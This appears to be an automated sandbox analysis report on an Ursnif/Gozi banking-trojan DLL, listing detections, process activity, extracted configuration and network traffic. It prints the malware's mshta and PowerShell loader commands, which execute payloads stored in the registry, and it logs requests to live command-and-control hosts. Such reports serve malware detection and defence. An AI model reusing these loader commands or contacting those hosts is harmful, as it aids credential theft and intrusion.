Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261 (renamed file extension from 19261 to dll)
Analysis ID:	351337
MD5:	4e62d8a29ba5805407ece642d63df461
SHA1:	320f45735c2da0a93359d00ae8d714b48f9c5531
SHA256:	ded0afec1ce538699df52daf0e024a3b2965fd0520e9ff4d5a8ed4c141967fb9
Tags:	Gozi
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Yara detected Ursnif

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6720 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)

rundll32.exe (PID: 6524 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6360 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

SpeechRuntime.exe (PID: 5704 cmdline: C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding MD5: 91858001E25FE5FF6E1C650BB4F24AB0)

iexplore.exe (PID: 7068 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5124 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 7084 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 608 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 5872 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 7048 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "217", "system": "b81731599bd7bb2de2d9647341cc92e4hh", "size": "201281", "crc": "2", "action": "00000000", "id": "1100", "time": "1612998941", "user": "d095a5848695dc15e71ab15c7c3f3fe3", "hash": "0x4a63e4e6", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 7048	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6720	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 8 entries

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5872, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 7048

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://c56.lepini.at/jvassets/xI/t64.dat

Avira URL Cloud: Label: phishing

Found malware configuration

Show sources

Source: loaddll32.exe.6720.1.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "217", "system": "b81731599bd7bb2de2d9647341cc92e4hh", "size": "201281", "crc": "2", "action": "00000000", "id": "1100", "time": "1612998941", "user": "d095a5848695dc15e71ab15c7c3f3fe3", "hash": "0x4a63e4e6", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 8%			Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%			Perma Link

Compliance:

Uses 32bit PE files

Show sources

Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source:	Binary string: c:\oxygenCondition\AlwaysIron\whoseReceive\Chargejoin\senthelp\Go.pdb source: loaddll32.exe, 00000001.00000002.638145001.000000006D936000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp

Spreading:

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D921B50 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,

1_2_6D921B50

Networking:

Source: Joe Sandbox View

ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic	HTTP traffic detected: GET /api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG77Zbx14Y4xpnJSaU_/2BLefveYrx/RefMzSY5Upyfbovm3/qmR0BBGI5hNv/ThDaqb_2FWx/xtufh9Msga_2BR/n0Re_2F1kn8UjgqbyTzQA/dUEEQb_2FY20zF3P/aP2AGWgGjayZp9N/yWUTgNMTKZ6EUJxA4O/ga_2BAyhH/6Y4krin4Qd0F9dpWa_2B/Ch_2FWBvvOfaFtGBtaq/0_2BX8pwR_2BJW2aCmXSlR/nA3h5ZuemZjTY/QscPrV_2/FMUurtz9meWYyTWZTPSvYNG/TWbWCTxFm9i/RC HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 10 Feb 2021 14:15:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: {E1BA15B4-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr	String found in binary or memory: http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S
Source: {E1BA15B2-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr	String found in binary or memory: http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lkn
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/i
Source: {E1BA15B6-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr	String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000027.00000002.530089766.000001E05BF71000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: loaddll32.exe, 00000001.00000002.638274435.000000006D969000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	String found in binary or memory: https://toldsend.com4

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY

Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D8E1C22 GetProcAddress,NtCreateSection,memset,	1_2_6D8E1C22
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D8E1252 GetLastError,NtClose,	1_2_6D8E1252
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D8E1AD1 NtMapViewOfSection,	1_2_6D8E1AD1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D8E23C5 NtQueryVirtualMemory,	1_2_6D8E23C5

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D8E21A4	1_2_6D8E21A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D8FF610	1_2_6D8FF610
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D92BA90	1_2_6D92BA90

Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll

Binary or memory string: OriginalFilenameGo.dllH& vs SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY

Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: classification engine

Classification label: mal100.troj.evad.winDLL@18/24@11/1

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E1BA15B0-6BF5-11EB-90E6-ECF4BB82F7E0}.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6E8265A0-F566-D0CB-EF82-F90493D63D78}
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SapiOneCoreServerStartingOrConnecting

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user~1\AppData\Local\Temp\~DF051F935A0216EDA8.TMP

Jump to behavior

Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

